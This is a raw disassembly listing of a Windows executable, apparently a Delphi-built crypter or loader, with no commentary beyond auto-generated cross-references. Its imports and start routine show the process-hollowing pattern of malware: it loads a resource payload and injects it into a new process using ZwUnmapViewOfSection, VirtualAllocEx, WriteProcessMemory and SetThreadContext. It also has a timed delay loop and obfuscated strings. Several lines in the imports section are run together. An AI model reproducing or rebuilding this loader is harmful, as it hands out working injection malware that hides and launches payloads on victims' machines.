a@gsOqdcknekHbd db '@gs`OqdcknEk`hbdoRsdFGR',0 ; DATA XREF: sub_4050C0+401�o
dd 0FFFFFFFFh, 0Ah
dword_40585C dd 2D636B6Bh, 6B6C6E6Dh, 7471h, 0FFFFFFFFh, 12ha@dkhenscNkmvnc db '@dkhEnSc`nkmvnCKQT',0 ; DATA XREF: sub_4050C0+442�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405884 proc near ; DATA XREF: CODE:004059B8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4058A9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407734
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4058B0
loc_4058A8: ; CODE XREF: sub_405884+2A�j
retn
; ---------------------------------------------------------------------------
loc_4058A9: ; DATA XREF: sub_405884+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_4058A8
; ---------------------------------------------------------------------------
loc_4058B0: ; CODE XREF: sub_405884:loc_4058A8�j
; DATA XREF: sub_405884+1F�o
pop ebp
retn
sub_405884 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4058B4 proc near ; DATA XREF: CODE:004059B4�o
sub ds:dword_407734, 1
retn
sub_4058B4 endp
; =============== S U B R O U T I N E =======================================
sub_4058BC proc near ; CODE XREF: CODE:004059F6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
add esp, 0FFFFFFE4h
mov ebx, eax
call sub_403DEC ; GetTickCount
add ebx, eax
jmp short loc_405907
; ---------------------------------------------------------------------------
loc_4058CB: ; CODE XREF: sub_4058BC+62�j
; sub_4058BC+68�j
push 1
push 0
push 0
push 0
lea eax, [esp+30h+var_20]
push eax
call sub_403E0C ; PeekMessageA
test eax, eax
jz short loc_405907
cmp [esp+20h+var_1C], 12h
jnz short loc_4058F4
mov eax, [esp+20h+var_18]
push eax
call sub_403E14 ; PostQuitMessage
jmp short loc_405926
; ---------------------------------------------------------------------------
loc_4058F4: ; CODE XREF: sub_4058BC+2A�j
push esp
call sub_403E1C ; TranslateMessage
push esp
call sub_403E04 ; DispatchMessageA
push 64h
call sub_403DFC ; Sleep
loc_405907: ; CODE XREF: sub_4058BC+D�j
; sub_4058BC+23�j
call sub_403DEC ; GetTickCount
xor edx, edx
push edx
push eax
mov eax, ebx
cdq
cmp edx, [esp+28h+var_24]
jnz short loc_405922
cmp eax, [esp+28h+var_28]
pop edx
pop eax
ja short loc_4058CB
jmp short loc_405926
; ---------------------------------------------------------------------------
loc_405922: ; CODE XREF: sub_4058BC+5B�j
pop edx
pop eax
jg short loc_4058CB
loc_405926: ; CODE XREF: sub_4058BC+36�j
; sub_4058BC+64�j
add esp, 1Ch
pop ebx
retn
sub_4058BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40592C proc near ; DATA XREF: CODE:004059C0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40594B
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405952
loc_40594A: ; CODE XREF: sub_40592C+24�j
retn
; ---------------------------------------------------------------------------
loc_40594B: ; DATA XREF: sub_40592C+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_40594A
; ---------------------------------------------------------------------------
loc_405952: ; CODE XREF: sub_40592C:loc_40594A�j
; DATA XREF: sub_40592C+19�o
pop ebp
retn
sub_40592C endp
; ---------------------------------------------------------------------------
dword_405954 dd 0Dh ; BSS:off_407628�o
dd offset off_40595C
off_40595C dd offset loc_403D94 ; DATA XREF: CODE:00405958�o
dd offset sub_403D64
dd offset sub_403B88
dd offset sub_403B34
dd offset sub_403DCC
dd offset sub_403D9C
dd offset sub_403E5C
dd offset sub_403E2C
dd offset sub_40424C
dd offset sub_40421C
dd offset sub_404BE0
dd offset sub_404BB0
dd offset sub_404EE4
dd offset sub_404EB4
dd offset sub_404F1C
dd offset sub_404EEC
dd offset sub_404F54
dd offset sub_404F24
dd offset sub_404F8C
dd offset sub_404F5C
dd offset sub_4050C0
dd offset sub_405090
dd offset sub_4058B4
dd offset sub_405884
align 10h
dd offset sub_40592C
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
xor eax, eax
mov [ebp-20h], eax
mov [ebp-14h], eax
mov [ebp-18h], eax
mov [ebp-1Ch], eax
mov eax, offset dword_405954
call sub_403D20
xor eax, eax
push ebp
push offset loc_405B2F
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 1F4h
call sub_4058BC
call sub_4046BC
xor eax, eax
mov ds:dword_407844, eax
mov edx, offset dword_405B3C
mov eax, offset dword_40773C
call sub_403EA4
mov edx, offset byte_407740
mov ecx, ds:dword_40773C
call sub_402570
cmp ds:byte_407742, 0
jnz loc_405B14
mov edx, offset dword_405B40
mov eax, offset dword_407844
call sub_403EA4
mov ebx, eax
mov eax, offset dword_407738
mov edx, ds:dword_407844
call sub_403350
test ebx, ebx
jnz short loc_405A5F
push 0
call sub_403DD4 ; ExitProcess
loc_405A5F: ; CODE XREF: CODE:00405A56�j
mov eax, ds:dword_407738
call sub_40329C
push eax
mov eax, offset dword_407738
call sub_403348
mov edx, eax
mov eax, ebx
pop ecx
call sub_402570
cmp ds:byte_407740, 0
jz short loc_405AC3
lea edx, [ebp-1Ch]
mov eax, offset dword_407744
call sub_404180
mov eax, [ebp-1Ch]
call sub_4032F8
mov edx, eax
lea eax, [ebp-18h]
call sub_403248
mov edx, [ebp-18h]
lea ecx, [ebp-14h]
mov eax, ds:dword_407738
call sub_403F04
mov edx, [ebp-14h]
mov eax, offset dword_407738
call sub_40316C
loc_405AC3: ; CODE XREF: CODE:00405A85�j
mov eax, ds:dword_407738
call sub_40329C
call sub_40246C
mov ebx, eax
mov eax, ds:dword_407738
call sub_40329C
push eax
mov eax, offset dword_407738
call sub_403348
mov edx, ebx
pop ecx
call sub_402570
push 1
lea edx, [ebp-20h]
xor eax, eax
call sub_40269C
mov edx, [ebp-20h]
xor ecx, ecx
mov eax, ebx
call sub_404C00
test al, al
jz short loc_405B14
mov eax, ebx
call sub_40248C
loc_405B14: ; CODE XREF: CODE:00405A2D�j
; CODE:00405B0B�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_405B36
loc_405B21: ; CODE XREF: CODE:00405B34�j
lea eax, [ebp-20h]
mov edx, 4
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_405B2F: ; DATA XREF: CODE:004059E6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_405B21
; ---------------------------------------------------------------------------
loc_405B36: ; CODE XREF: CODE:00405B2E�j
; DATA XREF: CODE:00405B1C�o
pop ebx
call sub_403028
; ---------------------------------------------------------------------------
dword_405B3C dd 53h dword_405B40 dd 46h dd 2Fh dup(?)
CODE ends
; Section 2. (virtual address 00006000)
; Virtual size : 00000108 ( 264.)
; Section size in file : 00000108 ( 264.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 406000h
dword_406000 dd 0 ; sub_402F6C+2�w ...
dword_406004 dd 0 ; sub_402F10+37�r ...
byte_406008 db 2 ; DATA XREF: sub_403B88+D�w
db 8Dh, 40h, 0
dword_40600C dd 0 dword_406010 dd 0 word_406014 dw 1332h ; DATA XREF: sub_4028BC+6�r
; sub_4028BC:loc_402934�r ...
dw 0C08Bh
byte_406018 db 0 ; DATA XREF: sub_402998�r sub_4029B4�r ...
db 8Dh, 40h, 0
byte_40601C db 0 ; DATA XREF: sub_402E10-336�r
; sub_402E10:loc_402B15�r
db 8Dh, 40h, 0
byte_406020 db 0 ; DATA XREF: sub_402F9C:loc_402FFD�r
db 8Dh, 40h, 0
dword_406024 dd 0 dword_406028 dd 0 off_40602C dd offset sub_401E98 ; DATA XREF: sub_40246C+5�r
; sub_4024AC+3F�r
off_406030 dd offset sub_402028 ; DATA XREF: sub_40248C+5�r
; sub_4024AC+26�r
off_406034 dd offset sub_4023A8 ; DATA XREF: sub_4024AC+D�r
byte_406038 db 0 ; DATA XREF: sub_402508+36�r
aRsu db 'клхивохмншьзыйэщчъЮАЦ',0
aFxn@ db 'ДЕ█@',0
aError db 'Error',0 ; DATA XREF: sub_402F9C+6C�o
dw 0C08Bh
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_402F10+3�o
; sub_402F9C+32�o ...
dw 0C08Bh
byte_40607C db 30h ; DATA XREF: sub_402F10+41�r
db 31h, 32h, 33h
dd 37363534h, 42413938h, 46454443h
TlsIndex dd 0 ; DATA XREF: sub_403C90+C�r
; sub_403C90+37�r ...
dword_406090 dd 0 ; sub_403D20+33�o ...
dword_406094 dd 400000h dword_406098 dd 0 dword_40609C dd 0 dd 2 dup(0)
dword_4060A8 dd 1 dd 10h, 2, 20h, 4, 40h, 4, 40h
off_4060C8 dd offset dword_40767C ; DATA XREF: sub_4046BC+190�r
; sub_4046BC+324�r ...
off_4060CC dd offset dword_40769C ; DATA XREF: sub_4046BC+308�r
; sub_404C00+271�r
off_4060D0 dd offset dword_407678 ; DATA XREF: sub_4046BC+21D�r
; sub_404C00+170�r ...
off_4060D4 dd offset dword_407688 ; DATA XREF: sub_4046BC+76�r
; sub_404C00+103�r
off_4060D8 dd offset dword_407698 ; DATA XREF: sub_4046BC+2D9�r
; sub_404C00+89�r
off_4060DC dd offset dword_407690 ; DATA XREF: sub_4046BC+27B�r
; sub_404C00+C1�r
off_4060E0 dd offset dword_407680 ; DATA XREF: sub_4046BC+1BF�r
; sub_404C00+143�r
off_4060E4 dd offset dword_40766C ; DATA XREF: sub_4046BC+103�r
off_4060E8 dd offset dword_407670 ; DATA XREF: sub_4046BC+132�r
off_4060EC dd offset dword_407668 ; DATA XREF: sub_4046BC+D4�r
off_4060F0 dd offset dword_407684 ; DATA XREF: sub_4046BC+1EE�r
; sub_404C00+1E9�r
off_4060F4 dd offset dword_40768C ; DATA XREF: sub_4046BC+24C�r
; sub_404C00+EA�r
off_4060F8 dd offset dword_407674 ; DATA XREF: sub_4046BC+161�r
off_4060FC dd offset dword_4076A0 ; DATA XREF: sub_4046BC+31B�r
; sub_404C00+262�r
off_406100 dd offset dword_407694 ; DATA XREF: sub_4046BC+2AA�r
; sub_404C00+237�r
off_406104 dd offset dword_407664 ; DATA XREF: sub_4046BC+A5�r
align 100h
DATA ends
; Section 3. (virtual address 00007000)
; Virtual size : 00000849 ( 2121.)
; Section size in file : 00000849 ( 2121.)
; Offset to raw data for section: 00007000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 407000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_407000 dd offset loc_40377C ; DATA XREF: sub_403B88+2F�w
dword_407004 dd 0 dword_407008 dd 0 ; sub_402508+16�r
dword_40700C dd 0 ; CODE:00402D80�r
off_407010 dd offset sub_40101C ; DATA XREF: sub_402998+14�r
; sub_4029B4+16�r ...
off_407014 dd offset sub_401024 ; DATA XREF: sub_402E10-2B6�r
; CODE:00402D68�r ...
dword_407018 dd 0 ; sub_403028+B1�r
dword_40701C dd 400000h dword_407020 dd 300h byte_407024 db 0 ; DATA XREF: sub_402ED0+33�w
align 4
dword_407028 dd 0Ah dword_40702C dd 142340h dword_407030 dd 0 byte_407034 db 0 ; DATA XREF: sub_402F9C+1�r
byte_407035 db 0 ; DATA XREF: sub_4017AC+1B�r
; sub_4017AC:loc_40184E�r ...
byte_407036 db 2 ; DATA XREF: sub_403B88+28�w
align 4
dword_407038 dd 0 ; sub_403B34+19�o
word_40703C dw 0D7B0h ; DATA XREF: sub_403B88+4C�w
align 10h
dd 71h dup(0)
dword_407204 dd 0 ; sub_403B34+23�o
word_407208 dw 0D7B0h ; DATA XREF: sub_402F9C+A�r
; sub_403B88+55�w
align 10h
dword_407210 dd 0 align 10h
dword_407220 dd 0 dd 6Bh dup(0)
dword_4073D0 dd 0 word_4073D4 dw 0D7B0h ; DATA XREF: sub_403B88+5E�w
align 4
dd 71h dup(0)
dword_40759C dd 1 ; sub_401DA4+92�w ...
dword_4075A0 dd 3700Ch ; sub_401DA4+9B�w ...
dword_4075A4 dd 0 ; sub_403B88�w
dword_4075A8 dd 3 ; sub_403B88+B2�w ...
byte_4075AC db 0 ; DATA XREF: sub_4017AC+8E�w
; sub_4017AC:loc_401869�r ...
align 10h
dword_4075B0 dd 0 ; sub_4014EC+63�w ...
dword_4075B4 dd 6 dup(0) ; sub_4017AC+24�o ...
dword_4075CC dd 0 ; sub_401120+2A�w ...
dword_4075D0 dd 146684h ; sub_4011A8+A�r ...
off_4075D4 dd offset off_4075D4 ; DATA XREF: sub_4012C4+3E�o
; sub_401328+51�o ...
dd offset off_4075D4
dd 2 dup(0)
off_4075E4 dd offset off_4075E4 ; DATA XREF: sub_40156C+B�o
; sub_4015FC+E�o ...
dd offset off_4075E4
dd 2 dup(0)
off_4075F4 dd offset off_4075F4 ; DATA XREF: sub_4017AC+7F�o
; BSS:off_4075F4�o ...
off_4075F8 dd offset off_4075F4 ; DATA XREF: sub_401DA4:loc_401DB4�r
align 10h
off_407600 dd offset off_4075F4 ; DATA XREF: sub_4017AC+89�w
; sub_401950+1�r ...
dword_407604 dd 0FECh dword_407608 dd 0B97010h ; sub_401C40+2E�r ...
dword_40760C dd 0 ; sub_4017AC+5D�r ...
off_407610 dd offset off_407610 ; DATA XREF: sub_4017AC+42�o
; sub_401870+81�o ...
dd offset off_407610
align 10h
dword_407620 dd 0 ; sub_402F6C+D�o ...
dword_407624 dd 12FFB4h ; sub_402DE8+2�r
off_407628 dd offset dword_405954 ; DATA XREF: sub_402E70+6�r
; sub_402ED0+14�w
dword_40762C dd 0 ; sub_402ED0+1B�w
off_407630 dd offset dword_406090 ; DATA XREF: sub_402ED0+20�w
dd 6 dup(0)
byte_40764C db 0 ; DATA XREF: sub_403CD4�r
align 10h
dword_407650 dd 400000h ; sub_403D20+16�r ...
dword_407654 dd 0 ; CODE:loc_403D94�w
dword_407658 dd 0 dword_40765C dd 0 ; sub_403DCC�w
dword_407660 dd 0 ; sub_403E5C�w
dword_407664 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceA ; DATA:off_406104�o
dword_407668 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResource ; DATA:off_4060EC�o
dword_40766C dd 7C809FB5h ; resolved to->KERNEL32.LoadResource ; DATA:off_4060E4�o
dword_407670 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCount ; DATA:off_4060E8�o
dword_407674 dd 7C8260C2h ; resolved to->KERNEL32.FreeResource ; DATA:off_4060F8�o
dword_407678 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_40767C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_407680 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_407684 dd 7C801A5Dh ; resolved to->KERNEL32.VirtualProtectExdword_407688 dd 7C90E960h ; resolved to->NTDLL.ZwUnmapViewOfSectiondword_40768C dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_407690 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_407694 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_407698 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_40769C dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_4076A0 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4076A4 dd 0 ; sub_40424C�w
dword_4076A8 dd 0 ; sub_404BE0�w
dword_4076AC dd 0 ; sub_404EE4�w
dword_4076B0 dd 0 ; sub_404F1C�w
dword_4076B4 dd 0 ; sub_404F54�w
dword_4076B8 dd 0 ; sub_404F8C�w
dword_4076BC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_4076C0 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_4076C4 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_4076C8 dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_4076CC dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4076D0 dd 7C8260C2h ; resolved to->KERNEL32.FreeResourcedword_4076D4 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_4076D8 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_4076DC dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_4076E0 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_4076E4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4076E8 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_4076EC dd 7C85F229h ; resolved to->KERNEL32.EnumResourceNamesAdword_4076F0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4076F4 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_4076F8 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4076FC dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_407700 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_407704 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_407708 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_40770C dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_407710 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_407714 dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_407718 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_40771C dd 76C9A93Ch ; resolved to->IMAGEHLP.MakeSureDirectoryPathExistsdword_407720 dd 7CA40EE0h dword_407724 dd 7CA3F790h dword_407728 dd 7CAB8CB2h dword_40772C dd 42D779A3h dword_407730 dd 0 ; sub_4050C0+1F�w
dword_407734 dd 0 ; sub_4058B4�w
dword_407738 dd 0B6000Ch ; CODE:loc_405A5F�r ...
dword_40773C dd 104h ; CODE:00405A1B�r
byte_407740 db 1 ; DATA XREF: CODE:00405A16�o
; CODE:00405A7E�r
align 2
byte_407742 db 0 ; DATA XREF: CODE:00405A26�r
db 1
dword_407744 dd 375D3A5Dh, 37343856h, 3Eh dup(0)dword_407844 dd 37000h ; CODE:00405A38�o ...
align 200h
BSS ends
; Section 4. (virtual address 00008000)
; Virtual size : 000004F8 ( 1272.)
; Section size in file : 000004F8 ( 1272.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 408000h
dd 3 dup(0)
dd 8188h, 80B4h, 3 dup(0)
dd 8326h, 8110h, 3 dup(0)
dd 835Eh, 8120h, 3 dup(0)
dd 839Eh, 8130h, 3 dup(0)
dd 83D2h, 813Ch, 3 dup(0)
dd 841Eh, 8150h, 3 dup(0)
dd 8484h, 816Ch, 3 dup(0)
dd 84DAh, 8180h, 5 dup(0)
dword_4080B4 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_4080B8 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_4080BC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4080C0 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_4080C4 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_4080C8 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_4080CC dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4080D0 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4080D4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4080D8 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_4080DC dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_4080E0 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4080E4 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4080E8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_4080EC dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4080F0 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_4080F4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_4080F8 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_4080FC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_408100 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_408104 dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_408108 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle align 10h
dword_408110 dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_408114 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_408118 dd 7E42DF50h ; resolved to->USER32.CharNextA align 10h
dword_408120 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_408124 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_408128 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 10h
dword_408130 dd 77124880h dword_408134 dd 771544ADh dd 0
dword_40813C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_408140 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_408144 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_408148 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA align 10h
dword_408150 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_408154 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_408158 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_40815C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_408160 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_408164 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess dd 0
dword_40816C dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_408170 dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_408174 dd 7E41C96Ch ; resolved to->USER32.PeekMessageAdword_408178 dd 7E4196B8h ; resolved to->USER32.DispatchMessageA align 10h
dword_408180 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA align 8
aKernel32_dll db 'kernel32.dll',0
align 4
aDeletecritical db 'DeleteCriticalSection',0
align 10h
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aEntercriticals db 'EnterCriticalSection',0
align 10h
aInitializecrit db 'InitializeCriticalSection',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 6F4C0000h, 466C6163h
dd 656572h, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetversion db 'GetVersion',0
align 10h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 64496461h
dd 0
aGetthreadlocal db 'GetThreadLocale',0
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 65470000h, 636F4C74h
dd 49656C61h, 416F666Eh, 0
aGetcommandline db 'GetCommandLineA',0
dd 72460000h, 694C6565h, 72617262h, 79h, 74697845h, 636F7250h
dd 737365h, 72570000h, 46657469h, 656C69h, 6E550000h, 646E6168h
dd 4564656Ch, 70656378h, 6E6F6974h, 746C6946h, 7265h, 74520000h
dd 776E556Ch, 646E69h, 61520000h, 45657369h, 70656378h
dd 6E6F6974h, 0
aGetstdhandle db 'GetStdHandle',0
align 2
aUser32_dll db 'user32.dll',0
align 4
aGetkeyboardtyp db 'GetKeyboardType',0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72616843h, 7478654Eh
dd 64610041h, 69706176h, 642E3233h, 6C6Ch, 65520000h, 65755167h
dd 61567972h, 4565756Ch, 4178h, 65520000h, 65704F67h, 79654B6Eh
dd 417845h, 65520000h, 6F6C4367h, 654B6573h, 6C6F0079h
dd 74756165h, 642E3233h, 6C6Ch, 79530000h, 65724673h, 72745365h
dd 676E69h, 79530000h, 41655273h, 636F6C6Ch, 69727453h
dd 654C676Eh, 656B006Eh, 6C656E72h, 642E3233h, 6C6Ch, 6C540000h
dd 74655373h, 756C6156h, 65h, 47736C54h, 61567465h, 65756Ch
dd 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aKernel32_dll_0 db 'kernel32.dll',0
align 4
dd 6C530000h, 706565h, 6F4C0000h, 694C6461h, 72617262h
dd 4179h, 65470000h, 63695474h, 756F436Bh, 746Eh, 65470000h
dd 6F725074h, 64644163h, 73736572h, 0
aGetlasterror db 'GetLastError',0
align 4
aExitprocess db 'ExitProcess',0
aUser32_dll_0 db 'user32.dll',0
align 10h
dd 72540000h, 6C736E61h, 4D657461h, 61737365h, 6567h, 6F500000h
dd 75517473h, 654D7469h, 67617373h, 65h, 6B656550h, 7373654Dh
dd 41656761h, 0
aDispatchmessag db 'DispatchMessageA',0
align 2
aKernel32_dll_1 db 'kernel32.dll',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h
align 200h
_idata ends
; Section 5. (virtual address 00009000)
; Virtual size : 00000008 ( 8.)
; Section size in file : 00000008 ( 8.)
; Offset to raw data for section: 00009000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 409000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd 2 dup(0) ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 7Eh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 0000A000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 0000A000
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40A000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 200h
_rdata ends
; Section 9. (virtual address 00044000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00043400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 444000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start